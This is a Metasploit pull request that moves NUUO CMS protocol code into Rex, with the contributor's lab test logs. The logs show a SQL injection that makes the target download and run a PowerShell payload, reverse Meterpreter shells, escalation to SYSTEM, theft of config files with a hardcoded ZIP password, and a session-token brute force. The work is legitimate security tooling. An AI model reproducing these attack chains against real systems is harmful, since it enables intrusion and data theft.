
Update NUUO mixin, move code to Rex #11765

Merged
merged 16 commits into rapid7:master from ncs-rex on Apr 25, 2019

Conversation

jrobles-r7
Contributor

@jrobles-r7 jrobles-r7 commented Apr 22, 2019

Generalized the NUUO mixin code and moved the implementation to Rex. One of the nuuo modules has been updated to work with the new code.

Note: This does break the nuuo modules that have not been updated. I'm working on fixes for those as well.
All the modules have been updated.

Verification

  • rspec spec/lib/rex/proto/nuuo/
  • Verify all green
  • ./msfconsole -q
  • use auxiliary/gather/nuuo_cms_file_download
  • set rhosts <rhost>
  • set NCSBRUTEAPI true
  • run
  • Module runs successfully. Config files downloaded

@jrobles-r7
Contributor Author

Tested on Windows 10 running NCS Server v2.4.0

msf5 > use exploit/windows/nuuo/nuuo_cms_sqli
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://0.0.0.0:8080/EqtOgSEOY
[*] Local IP: http://192.168.171.150:8080/EqtOgSEOY
[*] Server started.
[*] Enabling xp_cmdshell and asking CMS to download and execute http://172.22.222.136:8080/EqtOgSEOY
[*] Injecting PowerShell payload
[+] Sending the payload to CMS...
[*] Executing shell...
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:49681) at 2019-04-24 06:58:12 -0500
[+] Deleted c:/windows/temp/jzyjzncewx.ps1
[*] Server stopped.

meterpreter > getuid
Server username: NT Service\MSSQLSERVER
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > 
msf5 > use exploit/windows/nuuo/nuuo_cms_fu
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Backing up LicenseTool.dll to NoaomDOkOZyn
[*] Uploading payload...
[*] Sleeping 15 seconds...
[*] Sending SENDLICFILE request, shell incoming!
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:49682) at 2019-04-24 06:59:25 -0500

meterpreter > 
[!] Please wait a bit while we clean up
[+] Successfully restored LicenseTool.dll!
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
[+] We should have SYSTEM now, enjoy your shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_fu) >
msf5 > use auxiliary/gather/nuuo_cms_file_download
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > set ncsbruteapi true
ncsbruteapi => true
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[*] Running module against 172.22.222.200

[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_CMServer.cfg_439756.cfg
[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_ServerConfig.cfg_025736.cfg
[*] 

    The user and server configuration files were stored in the loot database.
    The files are ZIP encrypted, and due to the lack of the archive/zip gem,
    they cannot be decrypted in Metasploit.
    You will need to open them up with zip or a similar utility, and use the
    password NUCMS2007! to unzip them.
    Annoy the Metasploit developers until this gets fixed!
    
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >

Tested on Windows 10 running NCS Server v2.1.0

msf5 > use auxiliary/gather/nuuo_cms_bruteforce
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] Running module against 172.22.222.200

[*] Bruteforcing session - this might take a while, go get some coffee!
[*] Generating 2621440 session tokens
[+] Found valid user session: 42204032
[*] Time taken: 1414.4688972589793 seconds; total tries 616910
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) > 

@jrobles-r7 jrobles-r7 marked this pull request as ready for review April 24, 2019 12:10
Only TCP is supported for the mixin.
@jrobles-r7 jrobles-r7 self-assigned this Apr 25, 2019
@jrobles-r7 jrobles-r7 merged commit f3a820b into rapid7:master Apr 25, 2019
@jrobles-r7 jrobles-r7 deleted the ncs-rex branch April 25, 2019 14:41
@jrobles-r7
Contributor Author

jrobles-r7 commented Apr 25, 2019

Release Notes

This update generalizes the Nuuo mixin and adds code to Rex for handling NCS requests/responses.

@gdavidson-r7 gdavidson-r7 added the rn-enhancement (release notes enhancement) label Apr 29, 2019